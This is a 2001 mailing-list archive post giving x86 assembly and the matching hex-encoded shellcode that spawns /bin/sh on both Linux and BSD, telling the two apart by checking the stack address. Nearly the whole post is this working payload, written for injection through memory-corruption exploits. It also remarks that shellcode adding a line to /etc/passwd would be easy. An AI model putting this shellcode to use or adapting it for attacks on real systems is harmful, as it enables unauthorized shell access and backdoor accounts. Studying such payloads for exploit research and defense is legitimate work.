The following asm was used to create the shellcode that follows it. The
shellcode works on both Linux and *BSD on x86 arch(tested on slackware and
freeBSD). The shellcode executes /bin/sh and does not do setresuid() which
would be necesarry for an exploit(can be done the same way I do execve(), yes
the code is ugly and not optimized but it does work). Thanks to zen-parse
and corecode for the help.
.text
.global main
main: jmp bottom
top: popl %ebx
xorl %edx, %edx
movl %ebx,0x8(%edi)
movl %edx,0xc(%edi)
leal 0x8(%edi),%ecx
leal 0xc(%esi),%edx
pushl %edx #envp
pushl %ecx #argv
pushl %ebx #string
movl $0xbfff0101, %esi
cmp %esi, %esp
jg linux
jmp bsd
exit: add $12, %esp
movl $0x11111112,%eax
xorl $0x11111113,%eax #syscall 1, exit
pushl %eax
int $0x80
linux: movl $0x1111113b, %eax
xorl $0x11111130, %eax #sycall 11 on linux, execve
int $0x80
jmp exit
bsd: movl $0x11111130, %eax
xorl $0x1111110b, %eax #sycall 59 on BSD, execve
pushl %eax
int $0x80
jmp exit
bottom: call top
.string "/bin/sh\0"
"\xeb\x4a\x5b\x31\xd2\x89\x5f\x08\x89\x57\x0c\x8d\x4f\x08\x8d\x56"
"\x0c\x52\x51\x53\xbe\x01\x01\xff\xbf\x39\xf4\x7f\x12\xeb\x1e\x83"
"\xc4\x0c\xb8\x12\x11\x11\x11\x35\x13\x11\x11\x11\x50\xcd\x80\xb8"
"\x3b\x11\x11\x11\x35\x30\x11\x11\x11\xcd\x80\xeb\xe2\xb8\x30\x11"
"\x11\x11\x35\x0b\x11\x11\x11\x50\xcd\x80\xeb\xd3\xe8\xb1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x90\x90"
Doing something where the system calls are the same is a little bit easier
because you don't have to test wether it is BSD or Linux. I have example
shellcode of this that writes hello world on my site,
www.lockeddown.net/dual.asm. write, open, close are sys calls 4, 5, 6
respectively on both linux and BSD, so writing shellcode to add a line to
/etc/passwd would be pretty easy and fairly small.
lockdown
This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 15:39:25 PDT